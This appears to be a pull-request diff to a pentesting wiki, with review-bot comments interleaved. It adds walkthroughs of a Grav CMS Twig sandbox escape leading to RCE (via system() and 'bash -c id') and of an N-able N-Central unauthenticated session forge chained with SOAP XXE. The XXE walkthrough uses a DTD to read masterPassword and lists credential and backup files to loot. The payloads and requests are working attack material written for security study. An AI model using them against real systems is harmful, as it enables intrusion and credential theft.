1 change: 1 addition & 0 deletions src/SUMMARY.md
@@ -375,6 +375,7 @@
- [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
- [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
- [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md)
- [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md)
- [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
- [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
- [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)
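Review bot: the hunk header records one added entry, but the rendered view does not mark which of these five lines it is, and none of the files in this diff adds a new page under mobile-pentesting/android-app-pentesting/, so confirm that the new entry's target file (for example `insecure-in-app-update-rce.md`) already exists in the repo or is added by this PR; otherwise the SUMMARY link will 404 in the built book. Style point: the auto-generated titles `Inputmethodservice Ime Abuse` and `Insecure In App Update Rce` would read better as `InputMethodService IME Abuse` and `Insecure In-App Update RCE`, matching the capitalisation of neighbouring entries such as `Install Burp Certificate` and `Google CTF 2018 - Shall We Play a Game?`.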
@@ -81,3 +81,4 @@ adb shell ime help
- **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices.
- **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on “secret text entry” as a security boundary (a malicious IME sits below the app UI).

{{#include ../../banners/hacktricks-training.md}}
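Review bot: the file this hunk belongs to is not named in the rendered view (the per-file header between the SUMMARY.md hunk and this one is missing), and the hunk header shows a single added line without marking which of the four it is. The content (`adb shell ime help`, malicious-IME mitigations) and the `../../banners/` include depth point to a page two levels under src/, so check that the addition is the trailing `{{#include ../../banners/hacktricks-training.md}}` (or the blank line before it) and that the include path resolves from that directory.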
26 changes: 26 additions & 0 deletions src/pentesting-web/ssti-server-side-template-injection/README.md
@@ -549,6 +549,30 @@ $output = $twig > render (
- In Twig and Twig (Sandboxed) section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)

#### Grav CMS evaluate_twig sandbox escape (CVE-2025-66294 + CVE-2025-66301)

Grav CMS versions prior to <code>1.8.0-beta.27</code> sanitize Twig by running <code>cleanDangerousTwig</code> before <code>evaluate_twig</code>, but the regex fails to strip nested calls. By abusing CVE-2025-66301 an authenticated but low-privileged user can still reach <code>/admin/pages/{page}</code> and edit the form "process" section, storing Twig that will later execute with sandbox restrictions disabled.

1. **Add a form that re-evaluates user input.** The page editor accepts JSON inside <code>data[_json][header][form]</code>. Submitting the snippet below wires the form field "name" into <code>evaluate_twig</code>, so whatever the victim submits later becomes a Twig expression:

```http
POST /admin/pages/contact/:add HTTP/1.1
Host: grav.local
Content-Type: application/x-www-form-urlencoded

_task=save&data[_json][header][form]={"name":"abuse","fields":{"name":{"type":"text","label":"Name"}},"process":[{"message":"{{ evaluate_twig(form.value('name')) }}"}]}
```

2. **Abuse undefined-function callbacks to reach PHP.** When the attacker or another user submits the public form at <code>/contact</code>, the value stored in <code>data[name]</code> hits <code>evaluate_twig</code>. The payload below registers <code>system()</code> as the handler for undefined Twig functions, disables the sandbox flag, and calls the command string:

```twig
{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }}
{% set _ = grav.config.set('system.twig.undefined_functions', false) %}
{{ grav.twig.twig.getFunction('bash -c id') }}
```

3. **Deliver platform-specific shells.** The Metasploit module <code>multi/http/grav_twig_ssti_sandbox_bypass_rce</code> automatically swaps the payload for <code>cmd/unix/*</code> or <code>cmd/windows/*</code> stagers and can compress or base64-encode longer commands to fit inside the Twig expression.

### Plates (PHP)

Plates is a templating engine native to PHP, drawing inspiration from Twig. However, unlike Twig, which introduces a new syntax, Plates leverages native PHP code in templates, making it intuitive for PHP developers.
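Review bot: in step 2 the prose says the second payload line "disables the sandbox flag", but that line sets `system.twig.undefined_functions` to `false`, which is Grav's undefined-function setting rather than a sandbox switch; either explain why that setting must be `false` for the `registerUndefinedFunctionCallback('system')` + `getFunction('bash -c id')` chain to reach `system()`, or reword the description so it matches the code. Two smaller points: the `http` block sends raw JSON (`{`, `"`, spaces) in an `application/x-www-form-urlencoded` body, so say it is shown unencoded for readability; and the new section uses `<code>` HTML tags where the rest of this file uses backticks (see `SolrSearch` in the references at the bottom), so switch to backticks for consistency.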
@@ -1155,5 +1179,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt
- [https://portswigger.net/web-security/server-side-template-injection](https://portswigger.net/web-security/server-side-template-injection)
- [0xdf – HTB: Editor (XWiki SolrSearch Groovy RCE → Netdata ndsudo privesc)](https://0xdf.gitlab.io/2025/12/06/htb-editor.html)
- [XWiki advisory – `SolrSearch` RSS Groovy RCE (GHSA-rr6p-3pfg-562j / CVE-2025-24893)](https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j)
- [Rapid7 – Metasploit Wrap-Up 12/19/2025](https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025/)
- [Metasploit Module – multi/http/grav_twig_ssti_sandbox_bypass_rce.rb](https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/grav_twig_ssti_sandbox_bypass_rce.rb)

{{#include ../../banners/hacktricks-training.md}}
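Review bot: both new entries are secondary sources for the Grav section (a vendor wrap-up post and a raw module file); since that section names CVE-2025-66294 and CVE-2025-66301, add the upstream Grav advisories for those two CVEs as primary references. Also link the Metasploit module through its repository page or a pinned commit rather than `raw.githubusercontent.com/.../master/...`, which serves plain text and silently changes whenever the module is edited.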
7 changes: 7 additions & 0 deletions src/pentesting-web/web-vulnerabilities-methodology.md
@@ -28,6 +28,9 @@ In every Web Pentest, there are **several hidden and obvious places that might b
> Most of the web applications will **allow users to input some data that will be processed later.**\
> Depending on the structure of the data the server is expecting some vulnerabilities may or may not apply.

> [!NOTE]
> Keep an eye on privileged workflows (installation wizards, XML/SOAP "hello" calls, or CMS page builders). If they create sessions before enforcing ACLs you can often chain them with attacks such as [XXE - XEE - XML External Entity](xxe-xee-xml-external-entity.md) or [SSTI (Server Side Template Injection)](ssti-server-side-template-injection/index.html) to reach file disclosure or RCE even when the dangerous endpoint was meant to be post-authentication.

### **Reflected Values**

If the introduced data may somehow be reflected in the response, the page might be vulnerable to several issues.
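Review bot: the new admonition links SSTI as `ssti-server-side-template-injection/index.html`, whereas the XXE link on the same line and the links elsewhere in this file use source paths (`xxe-xee-xml-external-entity.md`, `web-tool-wfuzz.md`, `browser-extension-pentesting-methodology/`); use `ssti-server-side-template-injection/README.md` or the directory form so the link resolves in the mdBook source as well as on the rendered site. The phrase `XML/SOAP "hello" calls` is also opaque on its own; name the pattern it refers to (an unauthenticated session-creation call such as a SOAP `sessionHello`) or drop that example.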
@@ -211,4 +214,8 @@ Modern applications extend into browsers, wallets, and automation pipelines—ke
- [ ] [**Browser Extension Pentesting**](browser-extension-pentesting-methodology/)
- [ ] [**wfuzz Web Fuzzing**](web-tool-wfuzz.md)

## References

- [Rapid7 – Metasploit Wrap-Up 12/19/2025](https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025/)

{{#include ../banners/hacktricks-training.md}}
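Review bot: the new `## References` section holds a single blog entry that nothing in this page cites; the admonition added near the top of the file is the only text that draws on it, so either reference the Rapid7 post from that note or add the underlying vendor advisories next to it, otherwise the section reads as an orphan on a methodology page that previously had no references list.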
44 changes: 44 additions & 0 deletions src/pentesting-web/xxe-xee-xml-external-entity.md
@@ -769,6 +769,48 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal

Take a look to this amazing report [https://swarm.ptsecurity.com/impossible-xxe-in-php/](https://swarm.ptsecurity.com/impossible-xxe-in-php/)

### Chaining unauthenticated session bypass with SOAP XXE (N-able N-Central)

N-able N-Central (<code>2025.4.0.9</code>) exposes SOAP endpoints that can be abused in tandem: CVE-2025-9316 lets you mint a session without credentials and CVE-2025-11700 lets that session import attacker-supplied XML. The result is an unauthenticated arbitrary file read that leaks the contents of N-Central's own configuration and backup artifacts.

1. **Forge a session without credentials.** The <code>sessionHello</code> method on <code>/dms/services/ServerUI</code> accepts arbitrary appliance IDs and returns a <code>&lt;sessionID&gt;</code> even for unauthenticated clients. Brute-force the <code>applianceId</code> range (e.g., 1–30) until the server returns <code>200</code> plus a cookie:

```xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<ns1:sessionHello xmlns:ns1="http://www.n-able.com/mickey">
<applianceId>7</applianceId>
</ns1:sessionHello>
</soapenv:Body>
</soapenv:Envelope>
```

2. **Stage a malicious log entry.** Reuse the hijacked session with <code>applianceLogSubmit</code> to write a base64-encoded service-template file under <code>/opt/nable/webapps/ROOT/applianceLog/network_check_log_&lt;ID&gt;.log</code> (the path is controllable via <code>LOG_PATH</code>). The payload is just XML that points to your DTD server:

```xml
<ns1:applianceLogSubmit xmlns:ns1="http://www.n-able.com/mickey">
<sessionID>1234567</sessionID>
<logType>NETWORK_CHECK_LOG</logType>
<contents>PD94bWwgdmVyc2lvbj0iMS4wIj8+PCFET0NUWVBF...</contents>
</ns1:applianceLogSubmit>
```

3. **Trigger the unsafe import.** Call <code>importServiceTemplateFromFile</code> on <code>/dms/services/ServerUI</code> and point <code>filePath</code> to the log you just wrote. When the server parses the file it will fetch your DTD over HTTP (self-signed HTTPS will fail with PKIX errors).

4. **Error-based DTD exfiltration.** Serve a DTD that resolves a local file and injects the bytes into an error message by referencing a non-existent path. The contents show up inside the SOAP fault that bubbles back to the attacker:

```xml
<!ENTITY % file SYSTEM "file:///opt/nable/etc/masterPassword">
<!ENTITY % boom "<!ENTITY error SYSTEM 'file:///nope/%file;'>">
%boom; %error;
```

**Operational notes**

- Interesting loot includes <code>/opt/nable/var/ncsai/etc/ncbackup.conf</code>, <code>/var/opt/n-central/tmp/ncbackup/ncbackup.bin</code> (PostgreSQL dumps), <code>/opt/nable/etc/keystore.bcfks</code>, <code>/opt/nable/etc/masterPassword</code>, and the usual <code>/etc/passwd</code>/<code>shadow</code> pairs.
- Because the file read happens inside a SOAP fault you can script the extraction by parsing the <code>&lt;detail&gt;&lt;string&gt;</code> element for the leaked bytes.
- Set the DTD server to HTTP (<code>DTD_PROTO=http</code>) unless you can present a certificate the Java stack trusts.

## Tools


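Review bot: the step-2 snippet is not reproducible as shown: it omits the `soapenv:Envelope`/`soapenv:Body` wrapper that step 1 shows for the same `ServerUI` endpoint, and the `<contents>` base64 is truncated after a prefix that decodes to `<?xml version="1.0"?><!DOCTYPE`, so state the structure of what is encoded (the text only says "XML that points to your DTD server") or show the decoded XML instead of the blob. Also clarify whether `LOG_PATH` (step 2) and `DTD_PROTO` (operational notes) are options of the referenced Metasploit module or server-side parameters; as written they read like N-Central settings. Style: `**Operational notes**` is a bold line doing the job of a heading in a file that uses `###`/`####` for sub-sections, so make it a heading, and replace the `<code>` HTML tags with backticks to match the file's markdown conventions.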
@@ -916,5 +958,7 @@ References for this vector are listed at the end of the page.
- [Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core XXE/SSRF + Path Traversal)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/)
- [Xerox FreeFlow Core Security Guide (architecture/ports)](https://securitydocs.business.xerox.com/wp-content/uploads/2025/03/Security-Guide-Information-Assurance-Disclosure-Xerox-FreeFlow-Core-8.0.pdf)
- [Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5](https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf)
- [Rapid7 – Metasploit Wrap-Up 12/19/2025](https://www.rapid7.com/blog/post/metasploit-wrap-up-12-19-2025/)
- [Metasploit Module – scanner/http/nable_ncentral_auth_bypass_xxe.rb](https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/http/nable_ncentral_auth_bypass_xxe.rb)

{{#include ../banners/hacktricks-training.md}}
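Review bot: the context line `References for this vector are listed at the end of the page.` introduces the FreeFlow Core entries, yet the two N-Central entries are appended to that same list with no separation; group the references by vector (or prefix each entry with the product name) so readers can tell which links support which section. The raw `master` module URL has the same drift problem as the one added to the SSTI page: pin it to a commit or link the module's repository page.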